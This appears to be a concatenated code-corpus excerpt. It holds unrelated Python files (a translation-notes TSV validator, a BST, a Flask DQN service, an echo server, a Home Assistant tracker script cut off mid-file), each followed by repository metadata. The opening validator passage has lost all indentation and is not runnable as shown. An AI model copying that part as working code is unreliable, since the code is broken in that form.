# If there is a match to passageLink_re, passage.group(1) is the URL or other text between
# the parentheses,
# and passage.group(2) is everything after the right paren to the end of line.
def checkPassageLinks(line):
state = State()
passage = passagelink_re.search(line)
while passage:
referent = passage.group(1)
referencedPath = os.path.join( os.path.dirname(state.path), referent )
if not suppress5 and not os.path.isfile(referencedPath):
reportError("invalid passage link: " + referent)
passage = passagelink_re.search(passage.group(2))
def checkReversedLinks(line):
if reversedlink_re.search(line):
reportError("Reversed link syntax")
def shortname(longpath):
shortname = longpath
if source_dir in longpath:
shortname = longpath[len(source_dir)+1:]
return shortname
unexpected_re = re.compile(r'\([^\)\[]*\]', re.UNICODE) # ']' after left paren
unexpected2_re = re.compile(r'\[[^\]\(]*\)', re.UNICODE) # ')' after left square bracket
# Column 9 (OccurrenceNote) verification
def verifyNote(note, verse):
state = State()
lines = note.split("<br>")
if verse == "intro" or (len(lines) > 1 and "#" in note):
if verse != "intro" and not suppress13:
reportError("Multiple lines in non-intro note")
for line in lines:
line = line.rstrip()
takeSplit(line)
checkLinks(line)
else: # should be a simple note
checkSimpleNote(note)
checkLinks(note)
state.closeNote()
checkAsterisks(note)
reportParens()
if len(note) > 0 and state.ascii and not suppress9:
reportError("No non-ASCII content in note")
if unexpected_re.search(note):
reportError("found ']' after left paren")
if unexpected2_re.search(note):
reportError("found ')' after left square bracket")
def checkColHeader(value, expected, col):
if value != expected:
reportError("Invalid column " + str(col) + " header: \"" + value + "\"")
def verifySupportRef(supportref, note):
if not passpage(supportref):
parts = supportref.split('/')
if len(parts) == 1:
folder = "translate"
article = parts[0]
else:
folder = parts[0]
article = parts[-1]
path = os.path.join(ta_dir, folder + "/" + article)
if not os.path.isdir(path):
reportError("Invalid SupportReference value: " + supportref)
elif not suppress14 and "rc://" in note and not supportref in note:
reportError("SupportReference value does not match any tA articles mentioned in note")
# Reports an error if there is anything wrong with the first row in the TSV file.
# That row contains nothing but column headings.
def checkHeader(row):
checkColHeader(row[0], "Book", 1)
checkColHeader(row[1], "Chapter", 2)
checkColHeader(row[2], "Verse", 3)
checkColHeader(row[3], "ID", 4)
checkColHeader(row[4], "SupportReference", 5)
checkColHeader(row[5], "OrigQuote", 6)
checkColHeader(row[6], "Occurrence", 7)
checkColHeader(row[7], "GLQuote", 8)
checkColHeader(row[8], "OccurrenceNote", 9)
def verifyGLQuote(quote, verse):
if verse == "intro":
if len(quote) != 0:
reportError("Unexpected (non-empty) value in GLQuote column of intro note")
elif not source_language in {'en'} and len(quote) > 0 and quote.isascii():
reportError("ASCII GLQuote (column 8)")
idcheck_re = re.compile(r'[^0-9a-z]')
# Checks the specified non-header row values.
# The row must have 9 columns or this function will fail.
def checkRow(row):
global book
global chapter
if not book:
book = row[0]
if row[0] != book:
reportError("Bad book name (" + row[0] + ")")
# Establish chapter number
if row[1] != 'front':
try:
c = int(row[1])
if c == chapter + 1:
chapter = c
elif c != chapter:
reportError("Non-sequential chapter number")
except ValueError as e:
c = 0
reportError("Non-numeric chapter number")
# Establish verse
if row[2] == 'intro':
verse = 0
else:
try:
# Based on 10/29/19 discussion on Zulip, the verse order in TSV file is not important.
verse = int(row[2])
if verse < 1 or verse > 176:
reportError("Invalid verse number (" + str(verse) + "). Probably should be \"intro\"")
except ValueError as e:
reportError("Non-numeric verse number")
if len(row[3]) != 4 or idcheck_re.search(row[3]):
reportError("Invalid ID")
if not row[4].isascii():
reportError("Non-ascii SupportReference value (column 5)")
elif row[4]:
verifySupportRef(row[4], row[8])
if len(row[5].strip()) > 0 and row[5].isascii():
reportError("Invalid (ASCII) OrigQuote (column 6)")
if row[6] not in {'-1', '0', '1', '2', '3', '4'}:
reportError("Invalid Occurrence value (should be a small number): " + row[6])
verifyGLQuote(row[7].strip(), row[2])
verifyNote(row[8], row[2])
# Processes the rows in a single TSV file.
def verifyFile(path):
global book
global chapter
global rowno
state = State()
state.setPath(path)
rowno = 0
data = tsv.tsvRead(path) # The entire file is returned as a list of lists of strings (rows).
heading = True
for row in data:
rowno += 1
nColumns = len(row)
if nColumns > 3:
# try:
# verse = int(row[2])
# except ValueError as e:
# verse = 0
# key = tsv.make_key(row, [3,2,1])
if nColumns == 9:
if rowno == 1:
checkHeader(row)
state.addRow(row[0:4])
book = None
chapter = 0
# verse = 0
else:
if state.locator and state.locator[3] == row[3]:
reportError("duplicate ID: " + row[3])
state.addRow(row[0:4])
checkRow(row)
else:
try:
if len(row[0]) == 3 and int(row[1]) > 0 and int(row[2]) > 0 and len(row[3]) == 4:
state.addRow(row[0:4])
except ValueError as e:
verse = 0
reportError("Wrong number of columns (" + str(nColumns) + ")")
else:
# key = row[0][0:3] + "..."
state.addRow(None)
reportError("Wrong number of columns (" + str(nColumns) + ")")
if state.nBlanknotes > 0:
reportError("has " + str(state.nBlanknotes) + " blank notes", False)
def verifyDir(dirpath):
for f in os.listdir(dirpath):
path = os.path.join(dirpath, f)
if os.path.isdir(path) and path[-4:] != ".git":
# It's a directory, recurse into it
verifyDir(path)
elif os.path.isfile(path) and f[-4:].lower() == '.tsv':
verifyFile(path)
sys.stdout.flush()
global nChecked
nChecked += 1
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] != 'hard-coded-path':
source_dir = sys.argv[1]
if os.path.isdir(source_dir):
verifyDir(source_dir)
elif os.path.isfile(source_dir):
path = source_dir
source_dir = os.path.dirname(path)
verifyFile(path)
nChecked = 1
else:
sys.stderr.write("Folder not found: " + source_dir + '\n')
print("Done. Checked " + str(nChecked) + " files.\n")
if issuesfile:
reportSuppressions()
issuesfile.close()
else:
print("No issues found.")
| [
"lversaw@gmail.com"
] | lversaw@gmail.com |
6a0a152d8eac4dcc2acedafa4d2959f0305b7068 | 9bb6c115e2747d451c7beb2a376be26c6e7df11f | /common/randomic.py | b9d35bd330c3d2ecb0d7206e26694fc0d2f402b7 | [
"MIT"
] | permissive | Marcoshsc/TravelingSalesmanProblem | 2b81ba3264a3de831e82943e7a28c083aa1ba60c | 4895c0f487c65cb5737bcad21252d3f5730b8d87 | refs/heads/main | 2022-12-27T03:37:04.646698 | 2020-10-14T16:41:45 | 2020-10-14T16:41:45 | 301,831,696 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | from typing import List, Tuple
import random
def getRandomGraph(vertexes: int, minimumWeight: float, maximumWeight: float) -> List[List[float]]:
if minimumWeight >= maximumWeight:
raise Exception('Range de valores inválido.')
matrix: List[List[float]] = [[0 for j in range(vertexes)] for i in range(vertexes)]
for i in range(vertexes):
for j in range(i):
value = random.uniform(minimumWeight, maximumWeight)
matrix[i][j] = value
matrix[j][i] = value
return matrix | [
"marcoshscunha@hotmail.com"
] | marcoshscunha@hotmail.com |
a02188849028431aad61eadd6cd314b320516ca9 | 045dcb3072a2c6426346769fbb60f0fa9e2eddc9 | /models/test.py | 808b6aa165bbbb4ff1f7c2409fbaea30d9e62d06 | [] | no_license | vasilisa/api-brainexp2 | 73a6cf9c77a6961bbe48f755af5a0365166d9920 | b02d6d7f9034fa23d1ce64d9a55fa34667d1b904 | refs/heads/main | 2023-06-16T07:15:47.687602 | 2021-07-06T09:37:06 | 2021-07-06T09:37:06 | 357,216,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,020 | py | """User model"""
from sqlalchemy import Column, Integer, BigInteger, ForeignKey, DATETIME, Float, VARCHAR, Text, Boolean, String, DateTime,JSON
from models.db import Model
from models.base_object import BaseObject
import datetime
class Test(BaseObject, Model):
'''
This is the table where we put the collected QUESTIONNAIRE data from the participants in the RLVARTASK: this only contains the responses but not the question content which is stored in the JS object on the server.
'''
id = Column(Integer, primary_key=True)
participant_id = Column(BigInteger,nullable=True)
prolific_id = Column(String(128))
handle = Column(String(128)) # handle from the BE
beginexp = Column(DateTime, nullable=True) # begin
endexp = Column(DateTime, nullable=True)
datatask = Column(JSON, nullable=True) # Data for the task
datasubinfo = Column(JSON, nullable=True) # Data for the task
debriefed = Column(Boolean)
status = Column(Integer, nullable = True)
bonus = Column(Text, nullable=True) # Data for the task
def __init__(self,prolific_id, participant_id, handle):
print('TASK INIT')
self.debriefed = False
self.participant_id = participant_id
self.prolific_id = prolific_id
self.handle = handle
self.status = 1
self.beginexp = datetime.datetime.now()
def get_id(self):
return str(self.id)
def get_participant_id(self):
return str(self.participant_id)
def get_prolific_id(self):
return str(self.prolific_id)
def get_handle(self):
return str(self.handle)
def get_datatask(self):
return str(self.datatask)
def get_datasubinfo(self):
return str(self.datasubinfo)
def errors(self):
errors = super(Test, self).errors()
return errors
| [
"vasilisaskv@gmail.com"
] | vasilisaskv@gmail.com |
69c21096b237b9ce16e3b4da5793975e146ff2be | 570a233b0ee62449c79c0818f47e572c003cecbd | /Regression_Video_Demo.py | 98c905a144ba7ca416ba21bd2c848e2cb592c648 | [] | no_license | muxiyang/Muxi-Repository- | 10c369c0c2d73f0331554f0233485e2b9211c294 | 430d5a22b3ef91e3eab01144374e9fdd57d52fdc | refs/heads/master | 2021-01-15T11:14:46.197783 | 2015-04-20T00:21:24 | 2015-04-20T00:21:24 | 29,981,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,189 | py | from __future__ import division
from pandas import Series, DataFrame
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import ttest_ind
import statsmodels.api as sm
from dateutil import parser # use this to ensure dates are parsed correctly
main_dir="/Users/newlife-cassie/Desktop/PUBPOL590"
root = main_dir + "/Data_All/"
## IMPORT DATA-----------------
df=pd.read_csv(root+"07_kwh_wide.csv",header=0)
#SIMPLE LINEAR PROBABILITY MODEL(LPM)
##lets see if consumption before a certain date determined your assignment
df['T']=0+(df['assignment']=='T')
#make a dummy variable for treatment assignment
#keep boolean statements in ()
## SET UP DATA
# get X matrix (left hand variables for our regression)
kwh_cols=[v for v in df.columns.values if v.startswith('kwh')]
#pretend that the treatment occured in 2015-01-04. We want the dates before
#'kwh-2015-01-01'is a string value--> v[0:3] gives 'kwh', v[-1:] gives 1
kwh_cols=[v for v in kwh_cols if int(v[-2:])<4]
#set up y and x
y=df['T']
X=df[kwh_cols]
X=sm.add_constant(X)
# RUN OLS
ols_model=sm.OLS(y,X)
ols_results= ols_model.fit() #fit the model
print(ols_results.summary())
| [
"muxi.yang@duke.edu"
] | muxi.yang@duke.edu |
e8105a52366def54b4792b62845b992e68d47ddd | 0033af08265ef1853b3f9c6116a85a1c78ca8684 | /modu/python_numpy_tutorial.py | a28ef48236c287f75cb7abdb1a2a7ac009ffb0ef | [
"MIT"
] | permissive | godong9/ml | ffe9b6bba0b5a51555d2cf68035541cb1b30ef7e | 2c735376f4366000685cd97de5df31aabc1c597e | refs/heads/master | 2020-03-25T03:45:29.786540 | 2018-10-02T09:52:12 | 2018-10-02T09:52:12 | 143,358,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 735 | py | # http://cs231n.github.io/python-numpy-tutorial/
nums = list(range(5)) # range is a built-in function that creates a list of integers
print(nums) # Prints "[0, 1, 2, 3, 4]"
print(nums[2:4]) # Get a slice from index 2 to 4 (exclusive); prints "[2, 3]"
print(nums[2:]) # Get a slice from index 2 to the end; prints "[2, 3, 4]"
print(nums[:2]) # Get a slice from the start to index 2 (exclusive); prints "[0, 1]"
print(nums[:]) # Get a slice of the whole list; prints "[0, 1, 2, 3, 4]"
print(nums[:-1]) # Slice indices can be negative; prints "[0, 1, 2, 3]"
nums[2:4] = [8, 9] # Assign a new sublist to a slice
print(nums) # Prints "[0, 1, 8, 9, 4]" | [
"godong9@gmail.com"
] | godong9@gmail.com |
2d5b940d77d34b7de17384dd4e26469ae2274991 | 85c618a75b722b7f3111c44262871bca4a9d0f8f | /tests/lee20130628.py | 79902071098741ab6a8353048dc511a16806f510 | [
"CC0-1.0"
] | permissive | yaukwankiu/armor | 1969ba0fb850f8cec80f7f25f0c2d6cf1bc8dc22 | 6c57df82fe3e7761f43f9fbfe4f3b21882c91436 | refs/heads/master | 2020-05-18T09:17:13.654568 | 2014-12-12T00:08:49 | 2014-12-12T00:08:49 | 20,916,678 | 1 | 0 | null | 2014-07-15T06:20:22 | 2014-06-17T08:54:34 | Python | UTF-8 | Python | false | false | 356 | py | # to test professor lee's proposed algorithm of global comparison
# c.f. https://docs.google.com/file/d/0B84wEiWytQMwQnZrcU50Q29rZnc/edit?usp=sharing
# 28-06-2013
"""
step 1: compute the centroids, and axes
step 2: transform the NWP data to RADAR data linearly
step 3: calculate the correlation
step 4: set the threshold and estimate the f1 score
"""
| [
"yaukwankiu@gmail.com"
] | yaukwankiu@gmail.com |
160221ba014060dc697eb128268aa8bdc031c938 | df0481ec6f72caab283cd27dc20e689cb72d48ce | /news_api/wsgi.py | 3e6f1e1aa7ad9f795c1dd09df3453d431ecbf918 | [
"MIT"
] | permissive | kbakhchedzhy/news-api-board | b1342739fcab9e87547f1cd6ffe270e7926cfe1e | 49cd9e1c34eb7c92e5362a10ead58dd05325e65e | refs/heads/master | 2023-06-04T23:06:20.360141 | 2021-06-14T21:18:00 | 2021-06-14T21:18:00 | 376,905,209 | 0 | 0 | null | 2021-06-14T20:11:01 | 2021-06-14T17:29:51 | Python | UTF-8 | Python | false | false | 393 | py | """
WSGI config for news_api project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "news_api.settings")
application = get_wsgi_application()
| [
"k.bakhchedzhy@gmail.com"
] | k.bakhchedzhy@gmail.com |
c340f5ae35cb6ada1d2fe7cae70e4fcd2150d17a | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf/gsn-edf_ut=2.5_rd=0.8_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=32/sched.py | 95f1fd42aa48e0981658416011cf8039490df40a | [] | no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py | -X FMLP -Q 0 -L 3 85 400
-X FMLP -Q 0 -L 3 62 200
-X FMLP -Q 0 -L 3 61 200
-X FMLP -Q 1 -L 2 55 300
-X FMLP -Q 1 -L 2 54 175
-X FMLP -Q 1 -L 2 35 200
-X FMLP -Q 2 -L 1 32 125
-X FMLP -Q 2 -L 1 25 100
-X FMLP -Q 3 -L 1 25 175
-X FMLP -Q 3 -L 1 22 100
14 150
10 250
| [
"ricardo.btxr@gmail.com"
] | ricardo.btxr@gmail.com |
9ebb16b914fced04b98c5b6a064841ca987a4e17 | ccf94dcb6b1500fcbbd56964ae8c4832a496b8b3 | /python/baiduads-sdk-auto/test/test_negative_word_packet.py | 2d84a0b0df973bbdbe590260f3d6719c3f2cf800 | [
"Apache-2.0"
] | permissive | baidu/baiduads-sdk | 24c36b5cf3da9362ec5c8ecd417ff280421198ff | 176363de5e8a4e98aaca039e4300703c3964c1c7 | refs/heads/main | 2023-06-08T15:40:24.787863 | 2023-05-20T03:40:51 | 2023-05-20T03:40:51 | 446,718,177 | 16 | 11 | Apache-2.0 | 2023-06-02T05:19:40 | 2022-01-11T07:23:17 | Python | UTF-8 | Python | false | false | 688 | py | """
dev2 api schema
'dev2.baidu.com' api schema # noqa: E501
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import baiduads
from baiduads.negativeword.model.negative_word_packet import NegativeWordPacket
class TestNegativeWordPacket(unittest.TestCase):
"""NegativeWordPacket unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testNegativeWordPacket(self):
"""Test NegativeWordPacket"""
# FIXME: construct object with mandatory attributes with example values
# model = NegativeWordPacket() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"tokimekiyxp@foxmail.com"
] | tokimekiyxp@foxmail.com |
f66d367cd6e818d2f464c01786bf01dada756def | fae0230fae5f2e762e299785cbd66ebf7330d937 | /watchtower/_io.py | 9474a5b819d01bd7b9c93eb35a3e6ecabc9bf44c | [] | no_license | NelleV/watchtower | e4bb6c178cfaf9bf909018692662769153a64d2b | 39b5ab198ed03cf4e0b11aa766683b244125bd58 | refs/heads/master | 2022-10-09T18:32:36.344014 | 2022-09-28T10:02:10 | 2022-09-28T10:02:10 | 80,778,407 | 1 | 3 | null | 2017-04-10T18:32:18 | 2017-02-02T23:19:39 | Python | UTF-8 | Python | false | false | 651 | py | import pandas as pd
import os
def _update_and_save(filename, raw, old_raw=None):
"""
"""
if old_raw is not None:
raw = pd.concat([raw, old_raw], ignore_index=True)
if "id" in raw.columns:
subset_column = "id"
elif "sha" in raw.columns:
subset_column = "sha"
else:
raise ValueError("No known column to distinguish subsets")
raw = raw.drop_duplicates(subset=[subset_column])
_save(filename, raw)
def _save(filename, raw):
try:
os.makedirs(os.path.dirname(filename))
except OSError:
pass
raw.to_json(filename, date_format="iso")
| [
"nelle.varoquaux@gmail.com"
] | nelle.varoquaux@gmail.com |
3c52afe069397e41486a991fd1e98c2ef777447d | 3d989666e6ceb2abc9175dcf7b1d0c1f8c76d205 | /py_solution/p172_factorial_trailing_zeroes.py | 2e88229ace7c046a24203162ad16036725347fd1 | [] | no_license | dengshilong/leetcode | 00ae0898b4645efd1de69a13f2fa92606e899297 | 5ab258f04771db37a3beb3cb0c490a06183f7b51 | refs/heads/master | 2021-01-10T11:58:10.396399 | 2020-04-10T12:10:54 | 2020-04-10T12:10:54 | 47,912,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 480 | py | class Solution(object):
def trailingZeroes(self, n):
"""
:type n: int
:rtype: int
"""
res = 0
while n >= 5:
temp = n // 5
res += temp
n = temp
return res
if __name__ == "__main__":
solution = Solution()
assert solution.trailingZeroes(3) == 0
assert solution.trailingZeroes(5) == 1
assert solution.trailingZeroes(10) == 2
assert solution.trailingZeroes(25) == 6
| [
"dengshilong1988@gmail.com"
] | dengshilong1988@gmail.com |
a9e659c7b7d5d6885ceeb0b122e3403266a264f2 | a5b4e9f912eb4b76ff573c36d34d2b0d031bc2c3 | /lapac/replay.py | c606ea1783c236b9bcd00e8739439bf65f5f2337 | [] | no_license | harwiltz/lapac | d13d99c323fd1357fe24b5ce2492ca4a64b5586d | 7ed711a162e48e545d9f9f515eef0fe91a96b430 | refs/heads/master | 2020-11-27T15:55:40.674235 | 2019-12-22T06:16:03 | 2019-12-22T06:16:03 | 229,519,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,462 | py | import numpy as np
import torch
class SequenceReplayBuffer(object):
def __init__(self, capacity, sequence_length, image_shape, action_shape):
self._pointer = 0
self._image_buf = np.zeros(shape=(capacity, (sequence_length + 1), *image_shape))
self._action_buf = np.zeros(shape=(capacity, sequence_length, *action_shape))
self._rew_buf = np.zeros(shape=(capacity, sequence_length))
self._step_type_buf = np.zeros(shape=(capacity, sequence_length))
self._capacity = capacity
self._weight = 0
self._device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def add(self, image_seq, action_seq, rew_seq, step_type):
if self._weight < self._capacity:
self._weight += 1
self._image_buf[self._pointer] = image_seq
self._action_buf[self._pointer] = action_seq
self._rew_buf[self._pointer] = rew_seq
self._step_type_buf[self._pointer] = list(map(lambda x: x.value, step_type))
self._pointer = (self._pointer + 1) % self._capacity
def sample(self, batch_size=1):
indices = np.random.randint(0, self._weight, size=batch_size)
return (
torch.FloatTensor(self._image_buf[indices]).to(self._device),
torch.FloatTensor(self._action_buf[indices]).to(self._device),
torch.FloatTensor(self._rew_buf[indices]).to(self._device),
self._step_type_buf[indices]
)
| [
"harley.wiltzer@mail.mcgill.ca"
] | harley.wiltzer@mail.mcgill.ca |
800a94fabc0155c29398bcc17a0e4d8358db9725 | 494f52fcf12e90b57e52771c7dd3954b99383bfb | /Server.py | 6e7e3e038a7b99ac862c18a1827e5ba292f1192f | [] | no_license | EricLuoisme/Network-Testing | 7af4c5f63806737ab6b6c11e7188694ac9aa58f2 | 9a25a35da2f65ff96230c7b2fd61f6ec642b00ea | refs/heads/master | 2020-04-16T17:51:37.912795 | 2019-01-15T07:57:37 | 2019-01-15T07:57:37 | 165,791,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 977 | py |
# Echo server program
import socket
import sys
HOST = '127.0.0.100' # Symbolic name meaning all available interfaces
PORT = 50007 # Arbitrary non-privileged port
s = None
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC,
socket.SOCK_STREAM, 0, socket.AI_PASSIVE):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except OSError as msg:
s = None
continue
try:
s.bind(sa)
s.listen(1)
except OSError as msg:
s.close()
s = None
continue
break
if s is None:
print('could not open socket')
sys.exit(1)
conn, addr = s.accept()
with conn:
print('Connected by', addr)
while True:
data = conn.recv(1024)
if not data: break
# conn.send(data)
back = str('hahaahahahah')
conn.send(back.encode('utf-8'))
# here we must send byte type
| [
"u6270944@anu.edu.au"
] | u6270944@anu.edu.au |
4b264c20eb1bab3755a8cd94df85f8220efbec42 | 6488bfaf433fcdcaac0534d099ea3cb368c7a0a9 | /Trees/BinarySearchTree.py | d66cc702cd56c9879660f5c36672f154c0b5a7a7 | [] | no_license | nma96/Python-Libraries | 413074c2a19732bdf9a4c0dfb7153daceb1cc18f | 3c6491584287e9c9464c90e6e48621619f7f9f6e | refs/heads/master | 2022-11-04T20:36:20.544296 | 2020-06-20T02:57:29 | 2020-06-20T02:57:29 | 273,060,779 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,734 | py | class TreeNode:
def __init__(self, key, val, left=None, right=None, parent=None):
self.key = key
self.payload = val
self.leftChild = left
self.rightChild = right
self.parent = parent
def hasLeftChild(self):
return self.leftChild
def hasRightChild(self):
return self.rightChild
def isLeftChild(self):
return self.parent and self.parent.leftChild == self
def isRightChild(self):
return self.parent and self.parent.rightChild == self
def isRoot(self):
return not self.parent
def isLeaf(self):
return not (self.rightChild or self.leftChild)
def hasAnyChildren(self):
return self.rightChild or self.leftChild
def hasBothChildren(self):
return self.rightChild and self.leftChild
def replaceNodeData(self, key, value, lc, rc):
self.key = key
self.payload = value
self.leftChild = lc
self.rightChild = rc
if self.hasLeftChild():
self.leftChild.parent = self
if self.hasRightChild():
self.rightChild.parent = self
class BinarySearchTree:
def __init__(self):
self.root = None
self.size = 0
def length(self):
return self.size
def __len__(self):
return self.size
def put(self, key, val):
if self.root:
self._put(key, val, self.root)
else:
self.root = TreeNode(key, val)
self.size = self.size + 1
def _put(self, key, val, currentNode):
if key < currentNode.key:
if currentNode.hasLeftChild():
self._put(key, val, currentNode.leftChild)
else:
currentNode.leftChild = TreeNode(key, val, parent=currentNode)
else:
if currentNode.hasRightChild():
self._put(key, val, currentNode.rightChild)
else:
currentNode.rightChild = TreeNode(key, val, parent=currentNode)
def __setitem__(self, k, v):
self.put(k, v)
def get(self, key):
if self.root:
res = self._get(key, self.root)
if res:
return res.payload
else:
return None
else:
return None
def _get(self, key, currentNode):
if not currentNode:
return None
elif currentNode.key == key:
return currentNode
elif key < currentNode.key:
return self._get(key, currentNode.leftChild)
else:
return self._get(key, currentNode.rightChild)
def __getitem__(self, key):
return self.get(key)
def __contains__(self, key):
if self._get(key, self.root):
return True
else:
return False
def delete(self, key):
if self.size > 1:
nodeToRemove = self._get(key, self.root)
if nodeToRemove:
self.remove(nodeToRemove)
self.size = self.size - 1
else:
raise KeyError('Error, key not in tree')
elif self.size == 1 and self.root.key == key:
self.root = None
self.size = self.size - 1
else:
raise KeyError('Error, key not in tree')
def __delitem__(self, key):
self.delete(key)
def spliceOut(self):
if self.isLeaf():
if self.isLeftChild():
self.parent.leftChild = None
else:
self.parent.rightChild = None
elif self.hasAnyChildren():
if self.hasLeftChild():
if self.isLeftChild():
self.parent.leftChild = self.leftChild
else:
self.parent.rightChild = self.leftChild
self.leftChild.parent = self.parent
else:
if self.isLeftChild():
self.parent.leftChild = self.rightChild
else:
self.parent.rightChild = self.rightChild
self.rightChild.parent = self.parent
def findSuccessor(self):
succ = None
if self.hasRightChild():
succ = self.rightChild.findMin()
else:
if self.parent:
if self.isLeftChild():
succ = self.parent
else:
self.parent.rightChild = None
succ = self.parent.findSuccessor()
self.parent.rightChild = self
return succ
def findMin(self):
current = self
while current.hasLeftChild():
current = current.leftChild
return current
def remove(self, currentNode):
if currentNode.isLeaf(): # leaf
if currentNode == currentNode.parent.leftChild:
currentNode.parent.leftChild = None
else:
currentNode.parent.rightChild = None
elif currentNode.hasBothChildren(): # interior
succ = currentNode.findSuccessor()
succ.spliceOut()
currentNode.key = succ.key
currentNode.payload = succ.payload
else: # this node has one child
if currentNode.hasLeftChild():
if currentNode.isLeftChild():
currentNode.leftChild.parent = currentNode.parent
currentNode.parent.leftChild = currentNode.leftChild
elif currentNode.isRightChild():
currentNode.leftChild.parent = currentNode.parent
currentNode.parent.rightChild = currentNode.leftChild
else:
currentNode.replaceNodeData(currentNode.leftChild.key,
currentNode.leftChild.payload,
currentNode.leftChild.leftChild,
currentNode.leftChild.rightChild)
else:
if currentNode.isLeftChild():
currentNode.rightChild.parent = currentNode.parent
currentNode.parent.leftChild = currentNode.rightChild
elif currentNode.isRightChild():
currentNode.rightChild.parent = currentNode.parent
currentNode.parent.rightChild = currentNode.rightChild
else:
currentNode.replaceNodeData(currentNode.rightChild.key,
currentNode.rightChild.payload,
currentNode.rightChild.leftChild,
currentNode.rightChild.rightChild)
| [
"nikhilaatrei96@gmail.com"
] | nikhilaatrei96@gmail.com |
15d3ac01514ea7cdfe700a4c8d1989e8ffef3f2f | f6f24e56f8d3fa576950c7c8008a91502d19938b | /keep/lasthit_07_1vs1 1 creep/server/webservice.py | d82d81e3b2007426f07b53b4798b1d377742b8a0 | [] | no_license | peachman05/BotLastHit | dc42862496f8b61c9efd4476832e29554f08f12f | d48917d56a76de81ab35a1067cf011a41fd96001 | refs/heads/master | 2021-09-07T23:48:24.892765 | 2018-03-03T14:06:48 | 2018-03-03T14:06:48 | 119,542,895 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 911 | py | from flask import Flask, jsonify, request
from DQN import DQNAgent
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = ""
app = Flask(__name__)
num_state = 31
num_action = 5
num_hidden_node = [24,24]
# m =
dqn_agent = DQNAgent(num_state,num_action,num_hidden_node)
@app.route('/model', methods=['GET'])
def get_model():
return jsonify(dqn_agent.get_model())
# return "test"
@app.route('/update', methods=['POST'])
def update():
dqn_agent.run(request.json)
print("finish run")
return jsonify(dqn_agent.get_model())
# @app.route('/CreepBlockAI/dump', methods=['GET'])
# def dump():
# m.dump()
# return jsonify({})
# @app.route('/CreepBlockAI/load', methods=['POST'])
# def load():
# m.load(request.json['file'])
# return jsonify({})
if __name__ == '__main__':
app.run(debug=True) | [
"patcharapon1995@gmail.com"
] | patcharapon1995@gmail.com |
5e532275021cbb80eefe6334a4bee586a7e19910 | 79a273c1f2b59ae9adb3f721b228f889aa8b3f8e | /Examples/Alok Saboo/homeassistant/python_scripts/meta_device_tracker.py | 1552a0ab345521cdd9a42f08f3708398cd8c917f | [] | no_license | AndrMoura/DISHASS | 874e3566c212540f71383b8d95810264b957c44e | 5f5e987313d76d0a8796e093257bf7c66c399c5f | refs/heads/master | 2020-04-12T19:59:11.499861 | 2019-01-31T00:05:18 | 2019-01-31T00:05:18 | 162,723,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,318 | py | # Combine multiple device trackers into one entity
# You can call the script using the following:
# - service: python_script.meta_device_tracker
# data_template:
# entity_id: '{{trigger.entity_id}}'
# OPTIONS
# List the trackers for each individual
RashmiTrackers = ['device_tracker.rashmisiphone', 'device_tracker.rashmiphone_rashmiphone',
'device_tracker.rashmiappiphone', 'device_tracker.sonu_sonu',
'device_tracker.e1594e5321df414c82daf655d5282fca']
AlokTrackers = ['device_tracker.myiphone', 'device_tracker.alokphone_alokphone',
'device_tracker.alokiosiphone', 'device_tracker.alok_alok',
'device_tracker.elantrase', 'device_tracker.b4445761f6c04b7f835fcfdc03b47111']
# Get the entity that triggered the automation
triggeredEntity = data.get('entity_id')
# Set friendly name and the metatracker name based on the entity that triggered
if triggeredEntity in AlokTrackers:
newFriendlyName = 'Alok Tracker'
newEntityPicture = '/local/icons/Alok.png'
metatrackerName = 'device_tracker.meta_alok'
elif triggeredEntity in RashmiTrackers:
newFriendlyName = 'Rashmi Tracker'
newEntityPicture = '/local/icons/Rashmi.png'
metatrackerName = 'device_tracker.meta_rashmi'
else:
newFriendlyName = None
metatrackerName = None
# Get current & new state
newState = hass.states.get(triggeredEntity)
currentState = hass.states.get(metatrackerName)
# Get New data
newSource = newState.attributes.get('source_type')
newFriendlyName_temp = newState.attributes.get('friendly_name')
# If GPS source, set new coordinates
if newSource == 'gps':
newLatitude = newState.attributes.get('latitude')
newLongitude = newState.attributes.get('longitude')
newgpsAccuracy = newState.attributes.get('gps_accuracy')
# If not, keep last known coordinates
elif newSource is not None and currentState.attributes.get('latitude') is not None:
newLatitude = currentState.attributes.get('latitude')
newLongitude = currentState.attributes.get('longitude')
newgpsAccuracy = currentState.attributes.get('gps_accuracy')
# Otherwise return null
else:
newLatitude = None
newLongitude = None
newgpsAccuracy = None
# Get Battery
if newState.attributes.get('battery') is not None:
newBattery = newState.attributes.get('battery')
elif currentState is not None and currentState.attributes.get('battery') is not None:
newBattery = currentState.attributes.get('battery')
else:
newBattery = None
# Get velocity
